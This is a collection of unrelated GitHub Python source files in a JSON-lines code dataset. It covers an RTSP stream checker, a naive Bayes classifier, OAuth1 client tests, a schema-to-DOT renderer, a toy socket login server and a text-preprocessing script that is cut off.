defined\n config_step.python_result_code = \"\"\n mock_make_tests_results.return_value = {'local_result': 'warn'}\n config_step._make_results(build)\n self.assertEqual(build.local_result, 'warn')\n\n# TODO add generic test to copy_paste _run_* in a python step\n","repo_name":"odoo/runbot","sub_path":"runbot/tests/test_build_config_step.py","file_name":"test_build_config_step.py","file_ext":"py","file_size_in_byte":34725,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"31"} +{"seq_id":"2388475795","text":"# opencv_demo.py\n# OpenCV-Python timeout for opening a non-existent RTSP video stream\nimport threading\nimport time\n\nimport cv2\n\nTIME_LIMITED: int = 5\n\n\nclass MyThread(threading.Thread):\n def __init__(self, target, args=()):\n super(MyThread, self).__init__()\n self.func = target\n self.args = args\n\n def run(self):\n self.result = self.func(*self.args)\n\n def get_result(self):\n try:\n return self.result\n except Exception:\n return None\n\n\n# Decorator to limit the actual request time or function execution time\ndef limit_decor(limit_time):\n \"\"\"\n :param limit_time: Set the maximum allowable execution time, unit: second\n :return: Untimed returns the value of the decorated function; timed out returns None\n \"\"\"\n\n def functions(func):\n def run(*params):\n thre_func = MyThread(target=func, args=params)\n # The thread method terminates when the main thread terminates (exceeds its length)\n thre_func.setDaemon(True)\n thre_func.start()\n # Count the number of segmental slumbers\n sleep_num = int(limit_time // 1)\n sleep_nums = round(limit_time % 1, 1)\n # Sleep briefly several times and try to get the return value\n for i in range(sleep_num):\n time.sleep(1)\n infor = thre_func.get_result()\n if infor:\n return infor\n time.sleep(sleep_nums)\n # Final return value (whether or not the thread has terminated)\n if thre_func.get_result():\n return thre_func.get_result()\n else:\n return (False, None) # Timeout returns can be customized\n\n return run\n\n return functions\n\n\n@limit_decor(TIME_LIMITED)\ndef video_capture_open(rtsp):\n capture = cv2.VideoCapture(rtsp)\n return (True, capture)\n\n\ndef frame_get(rtsp):\n try:\n cap_status, cap = video_capture_open(rtsp)\n return cap_status\n except Exception as err:\n print(err)\n pass\n\n\ndef isOpen(rtsp) -> bool:\n return frame_get(rtsp)\n\n\nif __name__ == \"__main__\":\n open = isOpen('rtsp://admin:calming123@192.168.3.110:554/h264Preview_01_sub')\n if not open:\n print('rtsp不可读')\n else:\n print('rtsp可读')\n","repo_name":"MrSSai/RTSP2WS","sub_path":"rtsp.py","file_name":"rtsp.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40460175087","text":"# Rohith Ravindranath\n# Naive Bias Classifer\n# March 10 2019\n\nimport pandas as pd\nimport numpy as np\nfrom sys import argv\n\nclass NBClassifier:\n\n def read_data(self, file_name):\n data = pd.read_excel(file_name)\n return data\n\n def calculate_probability(self, buy, day, discount, delivery):\n day_given_buy_p = len(data.loc[(data['Purchase'] == buy) & (data['Day'] == day) ]) /len(data.loc[(data['Purchase'] == buy) ])\n discount_given_buy_p = len(data.loc[(data['Discount'] == discount) & (data['Purchase'] == buy) ]) /len(data.loc[(data['Purchase'] == buy)])\n delivery_given_buy_p = len(data.loc[(data['Free Delivery'] == delivery) & (data['Purchase'] == buy) ]) /len(data.loc[(data['Purchase'] == buy) ])\n buy_p = len(data.loc[ data['Purchase'] == buy ]) / len(data)\n day_p = len(data.loc[ (data['Day'] == day) ]) / len(data)\n discount_p = len(data.loc[(data['Discount'] == discount) ]) / len(data)\n delivery_p = len(data.loc[(data['Free Delivery'] == delivery) ]) / len(data)\n probability = (day_given_buy_p * discount_given_buy_p * delivery_given_buy_p * buy_p ) / (day_p * discount_p * delivery_p )\n return probability\n\n def classify(self, day, discount, delivery):\n yes_p = self.calculate_probability( 'Yes', day, discount, delivery)\n no_p = self.calculate_probability( 'No', day, discount, delivery)\n total_p = yes_p + no_p\n yes_p = yes_p / total_p\n no_p = no_p / total_p\n return yes_p*100,no_p*100\n\nif len(argv) != 5:\n print('USAGE: python3 NBC.py [file_name] [Buy? Yes or No] [Day? Weekday or Weekend or Holiday] [Discount? Yes or No] [Free Delivery? Yes or No]')\n exit()\nfile_name = argv[1]\nday = argv[2]\ndiscount = argv[3]\ndelivery = argv[4]\n\nnbc = NBClassifier()\ndata = nbc.read_data(file_name)\nyes,no = nbc.classify(day,discount,delivery)\nprint('Likelihood of Purchase: ' + str(round(yes, 2)) + '%')\nprint('Likelihood of No Purchase: ' + str(round(no, 2)) + '%')\n","repo_name":"rohithravin/Machine-Learning-Algorithms","sub_path":"Naive Bias Classifer/NBC.py","file_name":"NBC.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13058543805","text":"import os\nimport sys\nfrom os.path import expanduser\n\nscript = sys.argv[0]\ndirectory = sys.argv[1]\npath = os.path.dirname(directory)\nhome = expanduser(\"~\")\n\nrules = ('.mkv', '.webm', '.mp4')\n\nfor file in os.listdir(path):\n new_path = home + \"/\" + path + \"/\" + file + \"/\"\n for each in os.listdir(new_path):\n if each.endswith(\".json\"):\n src = new_path + each\n dst = new_path + \"video.json\"\n os.rename(src, dst)\n\n if each == \"Video1\":\n src = new_path + each\n dst = new_path + \"video.mkv\"\n os.rename(src, dst)\n\n","repo_name":"TechTube/TechTube-Replication-Package","sub_path":"Scripts/renamer/renamer.py","file_name":"renamer.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12615570741","text":"from turtle import *\nfrom math import floor\n\ndef draw_buildings(buildings,shift,scale):\n\n t = Turtle()\n t.pu()\n t.speed(0)\n t.hideturtle()\n for building in buildings:\n t.goto(building[0]*scale+shift,shift)\n t.pd()\n t.goto(building[0] * scale +shift, building[2] * scale +shift)\n t.goto(building[1] * scale+shift, building[2] * scale+shift)\n t.goto(building[1] * scale+shift, shift)\n t.pu()\ndef draw_line(lines,shift,scale):\n t = Turtle()\n t.pu()\n t.speed(0)\n t.pensize(3)\n t.hideturtle()\n\n for line in lines:\n if line[1] > 0:\n t.pencolor('red')\n t.goto(line[0] * scale + shift, shift)\n t.pd()\n t.goto(line[0] * scale + shift, line[1] * scale + shift)\n t.pu()\n else:\n t.pencolor('green')\n t.goto(line[0] * scale + shift, shift)\n t.pd()\n t.goto(line[0] * scale + shift, shift-100)\n t.pu()\ndef build_data(buildings):\n l=[]\n r=[]\n h=[]\n for building in buildings:\n l.append(building[0])\n r.append(building[1])\n h.append(building[2])\n return l,r,h\n\ndef maxheight(x):\n max = 0\n for building in buildings:\n if (x>=building[0] and xmax):\n max = building[2]\n return max\n\n\ndef sil(p,q):\n m = floor((p+q)/2)\n if p == q:\n return [(l[p],h[p]),(r[p],0)]\n else:\n left_result = sil(p,m)\n right_result = sil(m+1,q)\n left_len = len(left_result) - 1\n right_len = len(right_result) - 1\n left_pt = 0\n right_pt = 0\n\n final_result = []\n\n while (left_pt <= left_len) and (right_pt <= right_len):\n if left_result[left_pt][0] < right_result[right_pt][0]: #take item with smaller x\n if (maxheight(left_result[left_pt][0]) == (left_result[left_pt][1])) and (len(final_result)==0 or final_result[-1][1]!=left_result[left_pt][1]):\n final_result.append(left_result[left_pt])\n elif (left_result[left_pt][1]) ==0:\n temp = (left_result[left_pt][0],maxheight(left_result[left_pt][0]))\n final_result.append(temp)\n left_pt = left_pt +1\n else:\n if maxheight(right_result[right_pt][0]) == (right_result[right_pt][1]) and (len(final_result)==0 or final_result[-1][1]!=right_result[right_pt][1]):\n final_result.append(right_result[right_pt])\n elif (right_result[right_pt][1]) ==0:\n temp = (right_result[right_pt][0],maxheight(right_result[right_pt][0]))\n final_result.append(temp)\n right_pt = right_pt +1\n\n\n\n if (right_pt <= right_len):\n final_result.extend(right_result[right_pt::])\n else:\n final_result.extend(left_result[left_pt::])\n\n return final_result\n\n\nif __name__ == \"__main__\":\n buildings = [[1,4,2],[8,9,5],[7,10,3],[3,6,3],[2,5,4]] #[1,4,2],[8,9,5],[7,10,3],[3,6,3],[2,5,4]\n l,r,h = build_data(buildings)\n #for i in range(11):\n # print(maxheight(i))\n draw_buildings(buildings,-500,100)\n result = sil(0,len(buildings)-1)\n print(result)\n draw_line(result,-500,100)\n\n done()","repo_name":"GaryTin/For_Hayley","sub_path":"3711asg1Q5.py","file_name":"3711asg1Q5.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28895897285","text":"FOREIGN_KEY_EDGE_CONNECT_PORT = 1\nFOREIGN_KEY_EDGE_CONNECT_NODE = 2\n\n\nclass DotRenderer:\n def __init__(self):\n self.label_foreign_key_edges = True\n self.foreign_key_edge_mode = FOREIGN_KEY_EDGE_CONNECT_NODE\n self.href_prefix = '#'\n\n def render(self, out_file, database):\n rendered_chunks = self.render_dot_chunks(database)\n\n out_file.writelines(rendered_chunks)\n\n def render_dot_chunks(self, database):\n yield 'digraph schema {\\n'\n yield ' outputorder=edgesfirst\\n'\n\n for schema in sorted(database.schemas.values(), key=lambda s: s.name):\n yield ' subgraph cluster_{} {{\\n'.format(schema.name)\n yield ' label = \"{}\"\\n'.format(schema.name)\n\n for table in schema.tables:\n yield self.render_table_node(table)\n\n yield ' }\\n'\n\n for schema in database.schemas.values():\n for table in schema.tables:\n yield self.render_table_edges(table)\n\n yield '}\\n'\n\n def render_table_node(self, table):\n return (\n '{indent}{node_name} [\\n'\n '{indent} shape = none\\n'\n '{indent} href = \"{href}\"\\n'\n '{indent} target = \"_top\"\\n'\n '{indent} label = {label}\\n'\n '{indent}]\\n'\n ).format(\n indent=' ',\n node_name=table_node_name(table.schema.name, table.name),\n href=\"{}{}\".format(self.href_prefix, table.name.replace('_', '-')),\n label=self.render_table_html_label(table)\n )\n\n def render_table_edges(self, table):\n return ''.join(\n self.render_foreign_key(table, foreign_key)\n for foreign_key in table.foreign_keys\n )\n\n def render_foreign_key(self, table, foreign_key):\n attributes = {}\n\n if self.label_foreign_key_edges:\n attributes['label'] = '{port} = {dest_port}'.format(\n port=foreign_key.columns[0],\n dest_port=foreign_key.ref_columns[0]\n )\n\n if self.foreign_key_edge_mode == FOREIGN_KEY_EDGE_CONNECT_PORT:\n source = '{node_name}:{port}'.format(\n node_name=table_node_name(table.schema.name, table.name),\n port=foreign_key.columns[0]\n )\n target = '{dest_node_name}:{dest_port}'.format(\n dest_node_name=table_node_name(\n foreign_key.ref_table.schema.name,\n foreign_key.ref_table.name\n ),\n dest_port=foreign_key.ref_columns[0]\n )\n else:\n source = '{node_name}'.format(\n node_name=table_node_name(table.schema.name, table.name)\n )\n target = '{dest_node_name}'.format(\n dest_node_name=table_node_name(\n foreign_key.ref_table.schema.name,\n foreign_key.ref_table.name\n )\n )\n\n return '{indent}{source} -> {target} [ {attributes} ];\\n'.format(\n indent=' ',\n source=source,\n target=target,\n attributes=' '.join(\n '{}=\"{}\"'.format(key, value)\n for key, value in attributes.items()\n )\n )\n\n def render_table_html_label(self, table):\n return (\n '<\\n'\n ' \\n'\n '{column_rows}\\n'\n '
{name}
>\\n'\n ).format(\n name=table.name,\n column_rows='\\n'.join(\n ' {attrs}'\n '{col_name}'\n '{data_type}'.format(\n attrs='PK' if (\n table.primary_key and\n c.name in table.primary_key.columns\n ) else '',\n col_name=c.name,\n data_type=c.data_type\n )\n for c in table.columns\n )\n )\n\n\ndef table_node_name(schema_name, table_name):\n return '{}_{}'.format(schema_name, table_name)\n","repo_name":"hendrikx-itc/pg-db-tools","sub_path":"src/pg_db_tools/dot_renderer.py","file_name":"dot_renderer.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"19211566502","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 18 07:47:48 2019\r\n\r\n@author: hp\r\n\"\"\"\r\nimport socket\r\ns = socket.socket()\r\nport = 12345\r\n\r\ns.bind(('', port))\r\n\r\ns.listen(5)\r\n\r\nwhile True: \r\n\r\n# Establish connection with client. \r\n c, addr = s.accept()\t \r\n print ('Got connection from', addr) \r\n data_1=b'Enter the email'\r\n c.send(data_1)\r\n data_2=c.recv(1024)\r\n data_2=data_2.decode(\"utf-8\")\r\n \r\n if data_2==\"ankur\":\r\n data_3=b'Enter the password'\r\n #data_3.encode(\"utf-8\")\r\n c.send(data_3)\r\n \r\n #data_69=bytes(data_2, 'utf-8')\r\n #c.send(data_69)\r\n data_4=c.recv(1024)\r\n data_4=data_4.decode(\"utf-8\")\r\n if data_4==\"kumar\":\r\n data_5=b'connection established'\r\n #data_5.encode(\"utf-8\")\r\n c.send(data_5)\r\n c.close()\r\n else:\r\n c.send(b'not valid')\r\n c.close()\r\n else:\r\n c.send(b'not valid')\r\n c.close() \r\n","repo_name":"ankur0rajput/Adhocnw","sub_path":"Client to server/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32321294949","text":"# coding: utf-8\n\nclass Solution:\n \"\"\"\n @param A: An integer array.\n @param k: A positive integer (k <= length(A))\n @param target: Integer\n @return a list of lists of integer\n \"\"\"\n def kSumII(self, A, k, target):\n # write your code here\n self.ret = []\n self.dfs(A, k, target, 0, [])\n return self.ret\n\n def dfs(self, A, k, target, index, candidates):\n if (target == 0) and (k == 0):\n self.ret.append(candidates)\n return None\n if (len(A) == index) or (target < 0) or (k < 0):\n return None\n # 跳过A[index]\n self.dfs(A, k, target, index + 1, candidates)\n # 保留A[index]\n new_candidates = []\n new_candidates.extend(candidates)\n new_candidates.append(A[index])\n self.dfs(A, k - 1, target - A[index], index + 1, new_candidates)\n\n# medium: http://lintcode.com/zh-cn/problem/k-sum-ii/\n","repo_name":"yingl/LintCodeInPython","sub_path":"k-sum-ii.py","file_name":"k-sum-ii.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"31"} +{"seq_id":"3653370369","text":"\"\"\"loss factory\"\"\"\n\nimport mindspore.nn as nn\nimport mindspore.ops as ops\n\n\nclass CrossEntropySmooth(nn.LossBase):\n \"\"\"CrossEntropy\"\"\"\n\n def __init__(self, smooth_factor=0., factor=0.):\n super(CrossEntropySmooth, self).__init__()\n self.smoothing = smooth_factor\n self.confidence = 1. - smooth_factor\n self.factor = factor\n self.log_softmax = ops.LogSoftmax()\n self.gather = ops.Gather()\n self.expand = ops.ExpandDims()\n\n def construct(self, logit, label):\n loss_aux = 0\n if self.factor > 0:\n logit, aux = logit\n auxprobs = self.log_softmax(aux)\n nll_loss_aux = ops.gather_d((-1 * auxprobs), 1, self.expand(label, -1))\n nll_loss_aux = nll_loss_aux.squeeze(1)\n smooth_loss = -auxprobs.mean(axis=-1)\n loss_aux = (self.confidence * nll_loss_aux + self.smoothing * smooth_loss).mean()\n logprobs = self.log_softmax(logit)\n nll_loss_logit = ops.gather_d((-1 * logprobs), 1, self.expand(label, -1))\n nll_loss_logit = nll_loss_logit.squeeze(1)\n smooth_loss = -logprobs.mean(axis=-1)\n loss_logit = (self.confidence * nll_loss_logit + self.smoothing * smooth_loss).mean()\n loss = loss_logit + self.factor * loss_aux\n return loss\n\n\ndef create_loss(args):\n if args.loss == 'cross_entropy_smooth':\n loss = CrossEntropySmooth(smooth_factor=args.smooth_factor,\n factor=args.factor)\n elif args.loss == 'softmax_cross_entropy_with_logits':\n loss = nn.SoftmaxCrossEntropyWithLogits(sparse=args.sparse,\n reduction=args.reduction)\n return loss\n","repo_name":"0jason000/mae_vit","sub_path":"src/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"3200500803","text":"# -*- coding: utf-8 -*-\n'''\n rauth.test_service_oauth1\n -------------------------\n\n Test suite for rauth.service.OAuth1Service.\n'''\n\nfrom base import RauthTestCase\nfrom test_service import HttpMixin, RequestMixin, ServiceMixin\n\nfrom rauth.compat import parse_qsl, quote, is_basestring, iteritems\nfrom rauth.service import OAuth1Service\nfrom rauth.session import OAUTH1_DEFAULT_TIMEOUT, OAuth1Session\nfrom rauth.utils import CaseInsensitiveDict, ENTITY_METHODS, FORM_URLENCODED\n\nfrom copy import deepcopy\nfrom hashlib import sha1\n\nfrom mock import patch\n\nimport rauth\n\nimport requests\n\nimport json\nimport pickle\n\n\nclass OAuth1ServiceTestCase(RauthTestCase, RequestMixin, ServiceMixin,\n HttpMixin):\n consumer_key = '000'\n consumer_secret = '111'\n\n access_token = '123'\n access_token_secret = '456'\n\n def setUp(self):\n RauthTestCase.setUp(self)\n\n self.request_token_url = 'http://example.com/request'\n self.access_token_url = 'http://example.com/access'\n self.authorize_url = 'http://example.com/authorize'\n self.base_url = 'http://example.com/api/'\n\n self.service = OAuth1Service(self.consumer_key,\n self.consumer_secret,\n name='service',\n request_token_url=self.request_token_url,\n access_token_url=self.access_token_url,\n authorize_url=self.authorize_url,\n base_url=self.base_url)\n\n self.session = self.service.get_session(('123', '456'))\n\n # patches\n self.session.request = self.fake_request\n self.service.get_session = self.fake_get_session\n\n def fake_get_auth_header(self, oauth_params, realm=None):\n auth_header = 'OAuth realm=\"{realm}\"'.format(realm=realm)\n params = ''\n for k, v in iteritems(oauth_params):\n params += ',{key}=\"{value}\"'.format(key=k, value=quote(str(v)))\n auth_header += params\n return auth_header\n\n @patch.object(rauth.session.HmacSha1Signature, 'sign')\n @patch.object(rauth.session, 'time')\n @patch.object(rauth.session, 'random')\n @patch.object(requests.Session, 'request')\n def fake_request(self,\n method,\n url,\n mock_request,\n mock_random,\n mock_time,\n mock_sig,\n header_auth=False,\n realm='',\n **kwargs):\n fake_random = 1\n fake_time = 1\n fake_sig = 'foo'\n fake_sig_meth = 'HMAC-SHA1'\n fake_nonce = sha1(str(fake_random).encode('ascii')).hexdigest()\n\n mock_request.return_value = self.response\n mock_random.return_value = fake_random\n mock_time.return_value = fake_time\n mock_sig.return_value = fake_sig\n\n method = method\n url = self.session._set_url(url)\n\n service = OAuth1Service(self.consumer_key,\n self.consumer_secret,\n name='service',\n request_token_url=self.request_token_url,\n access_token_url=self.access_token_url,\n authorize_url=self.authorize_url,\n base_url=self.base_url)\n\n session = service.get_session((self.access_token,\n self.access_token_secret))\n\n r = session.request(method,\n url,\n header_auth=header_auth,\n realm=realm,\n **deepcopy(kwargs))\n\n kwargs.setdefault('headers', {})\n kwargs['headers'] = CaseInsensitiveDict(kwargs['headers'])\n\n entity_method = method.upper() in ENTITY_METHODS\n if entity_method:\n kwargs['headers'].setdefault('Content-Type', FORM_URLENCODED)\n\n form_urlencoded = \\\n kwargs['headers'].get('Content-Type') == FORM_URLENCODED\n\n if is_basestring(kwargs.get('params')):\n kwargs['params'] = dict(parse_qsl(kwargs['params']))\n\n if is_basestring(kwargs.get('data')) and form_urlencoded:\n kwargs['data'] = dict(parse_qsl(kwargs['data']))\n\n oauth_params = {'oauth_consumer_key': session.consumer_key,\n 'oauth_nonce': fake_nonce,\n 'oauth_signature_method': fake_sig_meth,\n 'oauth_timestamp': fake_time,\n 'oauth_token': self.access_token,\n 'oauth_version': session.VERSION,\n 'oauth_signature': fake_sig}\n\n if header_auth:\n auth = mock_request.call_args[1]['auth']\n auth_header = self.fake_get_auth_header(oauth_params, realm=realm)\n self.assertEqual(auth(requests.Request()).headers['Authorization'],\n auth_header)\n kwargs['auth'] = auth\n elif entity_method:\n kwargs['data'] = kwargs.get('data') or {}\n\n if form_urlencoded:\n kwargs['data'].update(oauth_params)\n else:\n kwargs.setdefault('params', {})\n kwargs['params'].update(oauth_params)\n else:\n kwargs.setdefault('params', {})\n kwargs['params'].update(**oauth_params)\n\n mock_request.assert_called_with(method,\n url,\n timeout=OAUTH1_DEFAULT_TIMEOUT,\n **kwargs)\n return r\n\n def fake_get_session(self, token=None, signature=None):\n return self.session\n\n def test_get_session(self):\n s = self.service.get_session()\n self.assertIsInstance(s, OAuth1Session)\n\n def test_get_raw_request_token(self):\n resp = 'oauth_token=foo&oauth_token_secret=bar'\n self.response.content = resp\n r = self.service.get_raw_request_token()\n self.assertEqual(r.content, resp)\n\n def test_get_raw_request_token_missing_request_token_url(self):\n self.service.request_token_url = None\n resp = 'oauth_token=foo&oauth_token_secret=bar'\n self.response.content = resp\n with self.assertRaises(TypeError) as e:\n self.service.get_raw_request_token()\n self.assertEqual(str(e.exception),\n 'request_token_url must not be None')\n\n def test_get_request_token(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n self.assertEqual(request_token, 'foo')\n self.assertEqual(request_token_secret, 'bar')\n\n def test_get_request_token_with_json_decoder(self):\n self.response.content = json.dumps({'oauth_token': 'foo',\n 'oauth_token_secret': 'bar'})\n request_token, request_token_secret = \\\n self.service.get_request_token(decoder=json.loads)\n self.assertEqual(request_token, 'foo')\n self.assertEqual(request_token_secret, 'bar')\n\n def test_get_authorize_url(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n\n url = self.service.get_authorize_url(request_token)\n expected_fmt = 'http://example.com/authorize?oauth_token={0}'\n self.assertEqual(url, expected_fmt.format(request_token))\n\n def test_get_authorize_url_with_url_encoded_characters(self):\n token = 'uDV8XWNLSJjzMUSVfbG1gYHWMjY%3D'\n token_secret = 'e%2Bt9QCndiw1%2BtJbhy5UYVMAPTPo%3D'\n response_fmt = 'oauth_token={0}&oauth_token_secret={1}'\n self.response.content = response_fmt.format(token, token_secret)\n request_token, request_token_secret = self.service.get_request_token()\n\n url = self.service.get_authorize_url(request_token)\n expected_fmt = 'http://example.com/authorize?oauth_token={0}'\n self.assertEqual(url, expected_fmt.format(token))\n\n def test_get_raw_access_token(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n\n resp = 'oauth_token=foo&oauth_token_secret=bar'\n self.response.content = resp\n r = self.service.get_raw_access_token(request_token,\n request_token_secret)\n self.assertEqual(r.content, resp)\n\n def test_get_raw_access_token_missing_access_token_url(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n\n self.service.access_token_url = None\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n\n with self.assertRaises(TypeError) as e:\n self.service.get_raw_access_token(request_token,\n request_token_secret)\n self.assertEqual(str(e.exception),\n 'access_token_url must not be None')\n\n def test_get_access_token(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n access_token, access_token_secret = \\\n self.service.get_access_token(request_token,\n request_token_secret)\n self.assertEqual(access_token, 'foo')\n self.assertEqual(access_token_secret, 'bar')\n\n def test_get_access_token_with_json_decoder(self):\n self.response.content = 'oauth_token=foo&oauth_token_secret=bar'\n request_token, request_token_secret = self.service.get_request_token()\n\n self.response.content = json.dumps({'oauth_token': 'foo',\n 'oauth_token_secret': 'bar'})\n access_token, access_token_secret = \\\n self.service.get_access_token(request_token,\n request_token_secret,\n decoder=json.loads)\n self.assertEqual(access_token, 'foo')\n self.assertEqual(access_token_secret, 'bar')\n\n def test_request_with_optional_params_oauth_callback(self):\n params = {'oauth_callback': 'http://example.com/callback'}\n r = self.session.request('GET', 'http://example.com/', params=params)\n self.assert_ok(r)\n\n def test_request_with_optional_params_oauth_verifier(self):\n params = {'oauth_verifier': 'foo'}\n r = self.session.request('GET', 'http://example.com/', params=params)\n self.assert_ok(r)\n\n def test_request_with_optional_params_oauth_version(self):\n params = {'oauth_verifier': 'foo'}\n r = self.session.request('GET', 'http://example.com/', params=params)\n self.assert_ok(r)\n\n def test_request_with_optional_params_as_string(self):\n params = 'oauth_callback=http://example.com/callback'\n r = self.session.request('GET', 'http://example.com/', params=params)\n self.assert_ok(r)\n\n def test_request_with_optional_data_as_string(self):\n data = 'oauth_callback=http://example.com/callback'\n r = self.session.request('POST', 'http://example.com/', data=data)\n self.assert_ok(r)\n\n def test_request_with_optional_params_with_data(self):\n data = {'oauth_callback': 'http://example.com/callback'}\n r = self.session.request('POST', 'http://example.com/', data=data)\n self.assert_ok(r)\n\n def test_request_with_header_auth(self):\n r = self.session.request('GET',\n 'http://example.com/',\n header_auth=True)\n self.assert_ok(r)\n\n def test_request_with_header_auth_with_realm(self):\n r = self.session.request('GET',\n 'http://example.com/',\n header_auth=True,\n realm='http://example.com/foo/')\n self.assert_ok(r)\n\n def test_get_auth_session(self):\n resp = 'oauth_token=foo&oauth_token_secret=bar'\n self.response.content = resp\n s = self.service.get_auth_session('foo', 'bar')\n self.assertIsInstance(s, OAuth1Session)\n\n def test_get_auth_session_with_request_token_response(self):\n resp = 'oauth_token=foo&oauth_token_secret=bar'\n self.response.content = resp\n self.service.request_token_response = 'ok'\n s = self.service.get_auth_session('foo', 'bar')\n self.assertEqual(s.request_token_response, 'ok')\n\n def test_pickle_session(self):\n session = pickle.loads(pickle.dumps(self.session))\n\n # Add the fake request back to the session\n session.request = self.fake_request\n r = session.request('GET', 'http://example.com/', header_auth=True)\n self.assert_ok(r)\n","repo_name":"litl/rauth","sub_path":"tests/test_service_oauth1.py","file_name":"test_service_oauth1.py","file_ext":"py","file_size_in_byte":13259,"program_lang":"python","lang":"en","doc_type":"code","stars":1605,"dataset":"github-code","pt":"31"} +{"seq_id":"14773044976","text":"'''\nTo run this file, two arguements are expected:\n1. sampling: 'no-sample' or 'up-sample' or 'down-sample'\n2. domain: 'restaurant' or 'movie' or 'music' or 'ride'\nCommand Example: python preprocessing.py no-sample restaurant\n\nRead the lines from 55-58 and uncomment the correct line. Update the value of train_labels with the value of the train_sentences uncommented\nRun the file with the proper argument depending on the line uncommented\n'''\nimport sys\nimport bz2\nfrom collections import Counter\nimport re\nimport nltk\nimport numpy as np\nimport pandas\nimport pickle\nfrom sklearn.utils import resample\n\ntry:\n sampling = sys.argv[1] # takes values: no-sample | up-sample | down-sample\nexcept:\n print(\"Error Message:\\nArguement expected for sampling: no-sample | up-sample | down-sample\")\n exit()\n\n# domain = sys.argv[2]\n\ndataframe = pandas.read_csv(\"dataset/train.csv\", header=None, names=['sentence', 'sentiment'])\nprint(dataframe)\n\ndf_0 = dataframe[dataframe['sentiment']==0]\ndf_1 = dataframe[dataframe['sentiment']==1]\ndf_2 = dataframe[dataframe['sentiment']==2]\ndf_3 = dataframe[dataframe['sentiment']==3]\ndf_4 = dataframe[dataframe['sentiment']==4]\ndf_5 = dataframe[dataframe['sentiment']==5]\nprint(df_0.shape[0])\nprint(df_1.shape[0])\nprint(df_2.shape[0])\nprint(df_3.shape[0])\nprint(df_4.shape[0])\nprint(df_5.shape[0])\ndf_0 = resample(df_0, replace=True, n_samples=4000)\ndf_1 = resample(df_1, replace=True, n_samples=4000)\ndf_2 = resample(df_2, replace=True, n_samples=4000)\ndf_3 = resample(df_3, replace=True, n_samples=4000)\ndf_4 = resample(df_4, replace=True, n_samples=4000)\ndf_5 = resample(df_5, replace=True, n_samples=4000)\ndataframe = pandas.concat([df_0, df_1, df_2, df_3, df_4, df_5])\n\n# ======================================================================\n\ntrain_size = dataframe.shape[0]\nprint(train_size)\ndataframe = dataframe.sample(frac=1).reset_index(drop=True)\ndataset = dataframe.values\ntrain_sentences = dataset[0:24000,0]\ntrain_labels = dataset[0:24000,1].astype(int)\n\nprint(train_sentences[0])\n\ndataframe = pandas.read_csv(\"dataset/test.csv\", header=None, names=['sentence', 'sentiment'])\ndataframe = dataframe.dropna()\n# if domain == \"movie\":\n# dataframe['sentiment'].replace(['positive', 'negative'], [1, 0], inplace=True)\ndataframe = dataframe.sample(frac=1).reset_index(drop=True)\ndataset = dataframe.values\ntest_sentences = dataset[0:1000,0]\ntest_labels = dataset[0:1000,1].astype(int)\n\nprint(\"Data load completed..\")\n\n# Some simple cleaning of data\nfor i in range(len(train_sentences)):\n train_sentences[i] = re.sub('\\d','0',train_sentences[i])\nfor i in range(len(test_sentences)):\n test_sentences[i] = re.sub('\\d','0',test_sentences[i])\n\n# Modify URLs to \nfor i in range(len(train_sentences)):\n if 'www.' in train_sentences[i] or 'http:' in train_sentences[i] or 'https:' in train_sentences[i] or '.com' in train_sentences[i]:\n train_sentences[i] = re.sub(r\"([^ ]+(?<=\\.[a-z]{3}))\", \"\", train_sentences[i])\n\nfor i in range(len(test_sentences)):\n if 'www.' in test_sentences[i] or 'http:' in test_sentences[i] or 'https:' in test_sentences[i] or '.com' in test_sentences[i]:\n test_sentences[i] = re.sub(r\"([^ ]+(?<=\\.[a-z]{3}))\", \"\", test_sentences[i])\n\nwords = Counter() # Dictionary that will map a word to the number of times it appeared in all the training sentences\n# wordscount = []\n# max_c = 0\n# min_c = 1000000\nfor i, sentence in enumerate(train_sentences):\n # The sentences will be stored as a list of words/tokens\n train_sentences[i] = []\n sentence = sentence.replace(\"\\\\n\", \" \").replace(\"\\\\\", \"\").replace(\"\\/\", \"\").replace(\"\\\\t\", \" \")\n tokens = nltk.word_tokenize(sentence)\n # max_c = max(max_c, len(tokens))\n # min_c = min(min_c, len(tokens))\n # wordscount.append(len(tokens))\n for word in tokens: # Tokenizing the words\n words.update([word.lower()]) # Converting all the words to lowercase\n train_sentences[i].append(word)\n if i%20000 == 0:\n print(str((i*100)/train_size) + \"% done\")\nprint(\"100% done\")\n# print(\"max_c = \" + str(max_c))\n# print(\"min_c = \" + str(min_c))\n# print(\"average length = \" + str(sum(wordscount)/len(wordscount)))\n\n# Removing the words that only appear once\n# words = {k:v for k,v in words.items() if 